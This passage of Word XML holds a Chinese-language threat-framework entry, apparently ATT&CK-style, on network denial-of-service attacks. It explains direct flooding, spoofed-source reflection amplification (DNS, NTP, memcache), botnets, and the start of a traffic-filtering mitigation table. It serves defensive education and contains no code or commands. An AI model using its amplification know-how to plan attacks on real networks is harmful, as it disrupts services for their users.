            </w:r>
          </w:p>
          <w:p w14:paraId="51320944" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>影响类型：可用性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="079A5F35" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51E81329" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F33DBB1" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会执行网络拒绝服务（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）攻击来降低或阻止用户获得资源的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>可能性</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>耗尽服务（比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站、电子邮件、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用）所依赖</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的网络带宽</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。已发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>有攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出于政治目的或为了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>支持其它恶意活动</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而实施网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>oS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包括分散注意力，黑客行为和敲诈勒索。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1380004D" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>oS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>攻击发生时</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，指向资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>或资源依赖的网络连接和设备</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>恶意流量会耗尽</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>网络连接的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带宽</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>容量</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。例如，攻击者可能会向以</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1Gbps</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带宽与</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>nternet</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>互联的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络中</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>托管的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某个服务器发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10Gbps</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的流量。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击可能发生于单个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>系统或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的多个系统，通常称为分布式</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。已发现许多使网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>饱和的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同方法，但大多数方法可归为两大类：直接网络泛洪和反射放大。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30984C23" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多种</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>方法来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址伪造和僵尸网络。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD9D1A" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用攻击系统的原始</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址或伪造源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址来使得防御程序很难从攻击流量追溯到攻击系统或启用反射。这会降低或消除网络防御设备上源地址过滤的有效性，从而增加防御程序防御攻击的难度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6870C5BC" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>僵尸网络通常用于对网络和服务进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击。大型僵尸网络可以从遍布全球互联网的系统中产生大量流量。攻击者可能拥有足够</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>资源来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建和控制自己的僵尸网络基础设施，也可以租用已有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>僵尸网络来实施攻击。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一些最坏情况下，许多系统被用来生成请求，每个系统只需要发送少量数据就可以产生足够的数据量来使得目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>网络饱和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这种情况下，区分</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量和合法客户端变得非常困难。僵尸网络已经被用于一些</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>引人瞩目的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击行动，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2012</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年针对美国主要银行的一系列攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495EAE97" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:r w:rsidRPr="00567ECD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于直接针对托管系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00567ECD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00567ECD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，请参考“终端</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝服务”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505CA2E8" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>网络泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE28623" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接网络泛洪攻击是指使用一个或多个系统向目标服务的网络发送大量网络数据包。几乎任何网络协议都可以用于直接网络泛洪攻击。通常使用无状态协议（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ICMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），但也可以使用有状态协议（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694096BF" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反射</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>放大</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE419C4" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>可能会通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反射来放大其攻击流量。这种类型的网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击利用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>第三方服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中介，这个第三方</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会对</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址做出</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>回应</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。该第三方服务器通常称为反射器。攻击者以</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>伪造的源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>数据包到反射器</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实施反射</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与直接网络泛洪攻击类似，攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用多个系统来实施攻击，也可以使用僵尸网络。同样地，攻击者可以使用一个或多个反射器将流量集中</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>到目标上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BD621F" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>反射攻击通常利用响应量大于请求量的协议来放大其流量，通常称为反射放大攻击。攻击者可能能够生成比发送到放大器的请求大几个数量级的攻击流量。增长程度取决于许多变量，例如相关协议、所使用的技术以及实际造成攻击量放大的放大服务器。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>启用发射泛洪攻击的两个主要协议</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。当然</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>也有一些其它协议</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>发射泛洪攻击的相关记录。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特别是，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>memcache</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议显示出它是一个强大的协议，其放大倍数高达请求包的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>51200</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>倍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166A2B16" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="001810EF" w:rsidRPr="00567ECD" w14:paraId="29D539C7" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0203AD15" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00567ECD" w:rsidRDefault="001810EF" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6213BA0C" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00567ECD" w:rsidRDefault="001810EF" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001810EF" w:rsidRPr="00A65911" w14:paraId="74FBBD5C" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7416427C" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId20" w:history="1">
              <w:r w:rsidR="001810EF" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络流量过滤</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15017BEC" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>当泛洪数据量超过目标网络连接的容量时，通常有必要拦截上游的传入流量，从合法流量中过滤出攻击流量。此类防御措施可以由托管</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
